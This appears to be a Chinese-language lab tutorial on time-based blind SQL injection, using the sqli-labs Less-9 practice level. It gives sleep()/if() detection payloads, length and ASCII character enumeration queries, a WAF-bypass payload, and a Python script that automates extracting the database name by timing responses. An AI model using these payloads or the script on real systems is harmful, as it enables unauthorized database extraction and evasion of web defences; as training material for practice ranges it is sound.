基于时间的盲注

       也叫延时注入。通过观察页面，既没有回显数据库内容，又没有报错信息也没有布尔类型状态，那么我们可以考虑用“绝招”--延时注入。延时注入就是根据页面的响应时间来判断是否存在注入，一点一点注入出数据库的信息。我们以第9关为例，在id=1后面加单引号或者双引号，页面不会发生任何改变，所以我们考虑绝招延时注入。

1. 延时注入

?id=1' and sleep(5) --+   

如图所示，观察请求的时间线，大概在5秒以上，说明构造的sleep(5) 语句起作用，可以把这个时间线作为sql 注入的判断依据。

 

 

第一步：判断注入点

依次尝试以下类型的测试payload，延时5秒以上则说明判断成立，即存在注入

?id=1 and if(1,sleep(5),3) -- a
?id=1' and if(1,sleep(5),3) -- a
?id=1" and if(1,sleep(5),3) -- a

括号及各种过滤类型……

提示：sleep的时间可以自定义，时间太长效率太低、时间太短则不容易判断。

同时满足以下两种情况时，可以确定存在时间盲注

?id=1' and if(1, sleep(5), 3) -- a 延时5秒响应
?id=1' and if(0,sleep(5),3) -- a 正常响应

第二步：判断长度

利用MySQL的 if() 和 sleep() 判断查询结果的长度，从1开始判断，并依次递增。

?id=1' and if((length(查询语句) =1), sleep(5), 3) -- a

如果页面响应时间超过5秒，说明长度判断正确（sleep(5)）;
如果页面响应时间不超过5秒（正常响应），说明长度判断错误，继续递增判断长度。

第三步：枚举字符

利用MySQL的 if() 和 sleep() 判断字符的内容。
从查询结果中截取第一个字符，转换成ASCLL码，从32开始判断，递增至126。
关于ASCLL码可参考我的另一篇文章：ASCLL编码对照表

?id=1' and if((ascii(substr(查询语句,1,1)) =1), sleep(5), 3) -- a

如果页面响应时间超过5秒，说明字符内容判断正确；
如果页面响应时间不超过5秒（正常响应），说明字符内容判断错误，递增猜解该字符的其他可能性。

第一个字符猜解成功后，依次猜解第二个、第三个……第n个（n表示返回结果的长度）。

 获取数据库名字

延时注入与布尔盲注类似，构造方法如下，提交参数

 ?id=1' and if(ascii(substr(database(),1,1))= 115,sleep(5),0) --+

if(expr1,expr2,expr3)       如果expr1的值为true，则返回expr2的值，如果expr1的值为false，则返回expr3的值。 传送门-》mysql基础学习

 代码的含义就是如果数据库名字的第一个字符的acsii值为115，则进行延时，否则返回0即什么都不返回。

页面显示延时5 秒，说明数据库名字第一个字母的ASCII 值是115，也就是字母s。

3. 数据库名字第二个字母的判断，

?id=1' and if(ascii(substr(database(),2,1))= 101,sleep(5),0) --+

与盲注类似，后面就是猜数，这就是延时注入

可以绕waf的payload

and(select*from(select+sleep(4))a/**/union/**/select+1)='

 

第四步：时间盲注的弊端

1. 时间盲注的时间复杂度较高，需要消耗大量的时间。
2. 时间盲注容易受到网络波动等因素的影响，从而产生误差。

时间盲注误差大、时间成本高，通常情况下，能够证明注入存在就可以了。

第五步：盲注脚本

时间盲注通常会使用脚本自动化猜解，Python脚本如下，可按需修改

import requests
import time

# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload

# 目标网址（不带参数）
url = "http://0f3687d08b574476ba96442b3ec2c120.app.mituan.zone/Less-9/"
# 猜解长度使用的payload
payload_len = """?id=1' and if(
 (length(database()) ={n})
,sleep(5),3) -- a"""
# 枚举字符使用的payload
payload_str = """?id=1' and if(
 (ascii(
 substr(
 (database())
 ,{n},1)
 ) ={r})
, sleep(5), 3) -- a"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        start_time = time.time()
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面响应时间 = 结束执行的时间 - 开始执行的时间
        use_time = time.time() - start_time
        # 响应时间>5秒时，表示猜解成功
        if use_time > 5:
            print('测试长度完成，长度为：', length,)
            return length;
        else:
            print('正在测试长度：',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环，截取每一个字符
    for l in range(1, length+1):
        # 第二层循环，枚举截取字符的每一种可能性
        for n in range(33, 126):
            start_time = time.time()
            response = requests.get(url= url+payload_str.format(n= l, r= n))
            # 页面响应时间 = 结束执行的时间 - 开始执行的时间
            use_time = time.time() - start_time
            # 页面中出现此内容则表示成功
            if use_time > 5:
                str+= chr(n)
                print('第', l, '个字符猜解成功：', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)